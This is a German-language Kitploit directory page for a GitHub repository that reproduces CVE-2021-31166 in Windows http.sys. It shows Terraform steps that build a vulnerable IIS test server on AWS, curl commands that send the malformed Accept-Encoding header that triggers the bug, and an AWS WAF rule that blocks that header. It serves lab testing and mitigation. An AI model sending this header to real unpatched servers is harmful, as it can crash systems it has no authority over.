Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
WIn-CVE-2021-31166 | Kitploit
Tools/GitHubGitHub/bgsilvait/win-cve-2021-31166
SchwachstellenanalyseExploitationIDS/IPS-UmgehungWebsicherheitCloud-SicherheitDevSecOps
GitHubbgsilvait/win-cve-2021-31166

WIn-CVE-2021-31166

Repository anzeigen
vor 5 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

WIn-CVE-2021-31166

Dieses Repository ist inspiriert von 0vercl0k für einen Proof-of-Concept für CVE-2021-31166 ("HTTP Protocol Stack Remote Code Execution Vulnerability"), eine Use-After-Free-Dereferenzierung in http.sys, die von Microsoft im Mai 2021 gepatcht wurde.

Build-Infrastruktur

root@kitploit:~
git clone https://github.com/bgsilvait/WIn-CVE-2021-31166.git
cd WIn-CVE-2021-31166
terraform init
terraform plan
terraform apply --auto-approve

Das Terraform-Skript erstellt eine EC2-Instanz mit Windows Server Core 20H2, installiert IIS und fügt SSM-Berechtigungen hinzu, um eine Web-PowerShell-Sitzung von der AWS-Konsole aus zu öffnen. Es erstellt außerdem einen Application Load Balancer und verwendet die Instanz als Ziel. Standardmäßig fügt die Security Group nur IHRE IP als zulässig für den Zugriff per HTTP hinzu.

Werte abrufen

root@kitploit:~
#Define Values from Terraform Output
ALB=$(terraform output -raw lb_dns_name)
EC2IP=$(terraform output -json public_ip | jq -r '.[0]')

Konnektivität testen

root@kitploit:~
#Testing to ALB
while true; do curl -I $ALB --connect-timeout 1 ; done

#Testing Directly to EC2'
while true; do curl -I $EC2IP --connect-timeout 1 ; done

CVE-Header injizieren

root@kitploit:~
#Testing to ALB
curl -i $ALB -H "Accept-Encoding: doar-e, ftw, imo, ,"

#Testing Directly to EC2'
curl -i $EC2IP -H "Accept-Encoding: doar-e, ftw, imo, ,"

Regel für AWS WAFv2 zum Blockieren

root@kitploit:~
{
  "Name": "cve-block",
  "Priority": 0,
  "Statement": {
    "ByteMatchStatement": {
      "SearchString": "doar-e, ftw, imo, ,",
      "FieldToMatch": {
        "SingleHeader": {
          "Name": "accept-encoding"
        }
      },
      "TextTransformations": [
        {
          "Priority": 0,
          "Type": "NONE"
        }
      ],
      "PositionalConstraint": "EXACTLY"
    }
  },
  "Action": {
    "Block": {
      "CustomResponse": {
        "ResponseCode": 418,
        "CustomResponseBodyKey": "418"
      }
    }
  },
  "VisibilityConfig": {
    "SampledRequestsEnabled": true,
    "CloudWatchMetricsEnabled": true,
    "MetricName": "cve-block"
  }
}
Tool herunterladen